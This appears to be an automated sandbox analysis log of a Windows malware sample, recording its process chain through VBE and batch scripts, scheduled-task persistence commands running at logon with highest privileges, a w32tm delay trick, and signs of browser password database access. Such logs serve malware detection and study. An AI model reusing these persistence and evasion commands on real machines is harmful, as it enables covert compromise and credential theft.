Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: brKHjPUXOt.20.dr, Hbgxxnuhcv.20.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: hK8z1AmKO1.exe

ReversingLabs: Detection: 70%

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe

File read: C:\Users\user\Desktop\hK8z1AmKO1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\hK8z1AmKO1.exe "C:\Users\user\Desktop\hK8z1AmKO1.exe"
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PortsavesPerfdhcpsvc\jTMUiy4UT3fzJ0p29vviWqbG.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortsavesPerfdhcpsvc\oSG0DtwH58jESdPiWbQWqH7Kb5.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe "C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe"
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 13 /tr "'C:\PortsavesPerfdhcpsvc\upfc.exe'" /f
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\PortsavesPerfdhcpsvc\upfc.exe'" /rl HIGHEST /f
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\PortsavesPerfdhcpsvc\upfc.exe'" /rl HIGHEST /f
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UserOOBEBrokerU" /sc MINUTE /mo 10 /tr "'C:\PortsavesPerfdhcpsvc\UserOOBEBroker.exe'" /f
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UserOOBEBroker" /sc ONLOGON /tr "'C:\PortsavesPerfdhcpsvc\UserOOBEBroker.exe'" /rl HIGHEST /f
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "UserOOBEBrokerU" /sc MINUTE /mo 8 /tr "'C:\PortsavesPerfdhcpsvc\UserOOBEBroker.exe'" /rl HIGHEST /f
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\Recovery\sihost.exe'" /f
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Recovery\sihost.exe'" /rl HIGHEST /f
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Recovery\sihost.exe'" /rl HIGHEST /f
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aVgRtcWKvuiHvUKTYwWvDjIqa" /sc MINUTE /mo 13 /tr "'C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe'" /f
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aVgRtcWKvuiHvUKTYwWvDjIq" /sc ONLOGON /tr "'C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe'" /rl HIGHEST /f
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aVgRtcWKvuiHvUKTYwWvDjIqa" /sc MINUTE /mo 12 /tr "'C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe'" /rl HIGHEST /f
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sSMyRm55ZX.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown	Process created: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
Source: unknown	Process created: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
Source: unknown	Process created: C:\Recovery\sihost.exe C:\Recovery\sihost.exe
Source: unknown	Process created: C:\Recovery\sihost.exe C:\Recovery\sihost.exe
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\57b77989-b658-46d2-a5dc-3af9328f5068.vbs"
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ef498993-b965-4ad4-8c4b-72d20f78a4db.vbs"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\sihost.exe "C:\Recovery\sihost.exe"
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PortsavesPerfdhcpsvc\jTMUiy4UT3fzJ0p29vviWqbG.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortsavesPerfdhcpsvc\oSG0DtwH58jESdPiWbQWqH7Kb5.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe "C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe"	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sSMyRm55ZX.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\sihost.exe "C:\Recovery\sihost.exe"	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\57b77989-b658-46d2-a5dc-3af9328f5068.vbs"	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ef498993-b965-4ad4-8c4b-72d20f78a4db.vbs"	Jump to behavior

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: version.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Section loaded: cryptbase.dll	Jump to behavior
